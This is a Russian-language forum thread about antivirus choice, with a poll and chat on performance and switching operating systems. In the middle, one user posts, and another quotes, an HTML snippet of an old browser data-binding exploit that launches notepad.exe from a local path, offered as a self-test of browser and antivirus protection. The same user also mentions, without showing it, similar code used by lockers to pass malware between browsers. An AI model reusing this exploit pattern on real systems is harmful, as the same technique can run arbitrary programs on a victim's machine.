Антивирус

Какой антивирус вы предпочитаете?

• Касперский

Голосов: 44 34.9%
  • Nod32

Голосов: 38 30.2%
  • Avast

Голосов: 22 17.5%
  • Symantec

Голосов: 12 9.5%
  • Dr. Web

Голосов: 10 7.9%
  • Panda

Голосов: 0 0.0%

• Всего проголосовало
    126

comma

Новичок
ну вот у меня та же проблема, раньше грузилась секунд за 10, сейчас секунд 30 не меньше

А если теперь удалить Symantec "скорость" вернётся? (Обязательно заходить в систему под "пользователем" и по возможности отключить самые известные уязвимости (установить обновления на ОС, отключить потенциально опасные службы)).

Punisher

Активный пользователь
На днях читал заметку на одном из западных IT-сайтов - провели исследование и выяснилось что сейчас в среднем около 25% производительности настольных компьютеров с Windows тратится на работу антивирусов, фаерволов и прочих программ для борьбы с вредоносной активностью.
Четверть уходит на это!

Может от такой дырявой системы пора отказаться? :)
я бы с радостью отказался, но на свободных ОС нет игр, а если и есть то надо мучится с их запуском под вайном и т.д. и т.п....

Mike22

Местный
Загрузил Win, наигрался, перезагрузился в нормальную систему.
Некоторые так проблему решают.

zzzt

Джа велик! Джа жив! Слава Джа!
...Запустил браузер - посмотрел пару страничек, запустил блокнот - написал рассказик. Запустил плеер - послушал музычку, посмотрел киношку. Запустил Borland - написал программку для лабораторки. Вырубил комп и пошел спать\гулять\есть\etc.
На каком этапе мне реально есть необходимость перезагружаться в нормальную систему и зачем?

Mike22

Местный
zzzt, речь велась о вирусах.
Внимательнее читайте.
(не только последний пост в теме)

Жадный КаБан

Санкт-Петербург
интересно, какой у вас комп, если антивирус систему грузит?
все не только от машины и антивируса зависит. Сегодня только наблюдал, когда довольно таки мощный комп минуту определял обычную флешку на 4gb. А просто система была засорена сильно.

Mr.Freeman

Новичок
Заблокирован
Доброго времени суток,вот решил всётаки поставить антивирусник но не знаю какой лучше,и как ими вообще пользоваться,и где скачать чтобы он не кончился,а то я раньше ставил тупо установил и всё,30дней и они кончались,как всё это организовать

el laggio

Пользователь
Доброго времени суток,вот решил всётаки поставить антивирусник но не знаю какой лучше,и как ими вообще пользоваться,и где скачать чтобы он не кончился,а то я раньше ставил тупо установил и всё,30дней и они кончались,как всё это организовать

я пользуюсь этим - AVIRA

AlexXx

Местный
Для проверки вашей системы на уязвимость со стороны интернета, код обсолютно безопасен, он лишь открывает блокнот, в случает если компьютер не защищен от данного типа уязвимости.
Создаем файл с расширением txt, вставляем туда
Код:
<html>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span><xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/notepad.exe"></object>
]]>
</exploit>
</security>
</xml>
</html>
далее сохраняем и меняем расширение с txt на html и открываем. На запуск данного файла должен обязательно выругаться браузер, а антивирус завиресчать и удалить файл, который Вы создали, если этого не случилось то пора бы подумать снести и поставить другой антивирус и браузер.
Есть еще один код на выявление уязвимости, но писать его, по соображениям безопасности, нельзя!

И как же быть миллионам геймеров?
Если все перейдут на юниксы, то и игры будут на юниксы, да и вирусы тоже начнут появлятся и придем мы туда откуда начинали.

Dex

Уже освоился
Для проверки вашей системы на уязвимость со стороны интернета, код обсолютно безопасен, он лишь открывает блокнот, в случает если компьютер не защищен от данного типа уязвимости.
Создаем файл с расширением txt, вставляем туда
Код:
<html>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span><xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/notepad.exe"></object>
]]>
</exploit>
</security>
</xml>
</html>
далее сохраняем и меняем расширение с txt на html и открываем. На запуск данного файла должен обязательно выругаться браузер, а антивирус завиресчать и удалить файл, который Вы создали, если этого не случилось то пора бы подумать снести и поставить другой антивирус и браузер.
Avira PSS даже не дала открыть файл в браузере, сразу предложила удалить)

AlexXx

Местный
Вообще-то, по такому тесту смешно оценивать антивирус.
у мня на флехе такая шняга всегда находится с автораном в купе, если не сработал? то антивирь древний или на компе нет никакой защиты, скорее только для этого юзаю, чтобы лишних вопросов не задавать клиентуре, есть другой еще код, он используется в локерах, там реализация на передачу запуска виря от одного к другому приложению, например из оперы в IE, кстати многие антивири с месячной давности обновлениями не детектит действие кода.

Dex

Уже освоился
Кто-нибудь пользуется Outpost Security Suite Pro 7? Насколько эффективен в работе?

comma

Новичок
Как вы считаете, правомочен ли антивирус, наподобие Симантека категорически изничтожать кряки и т.п.? Касперский например за такими деяниями явно замечан не был. Например, политика может быть: 1) Считать за вирусы, т.к. несет потенциальную опасность пользователю, в результате их воздействия может наступить уголовная ответственность; 2) Ничего вредоносного не несут,об ответственности задумывается каждый.

Сверху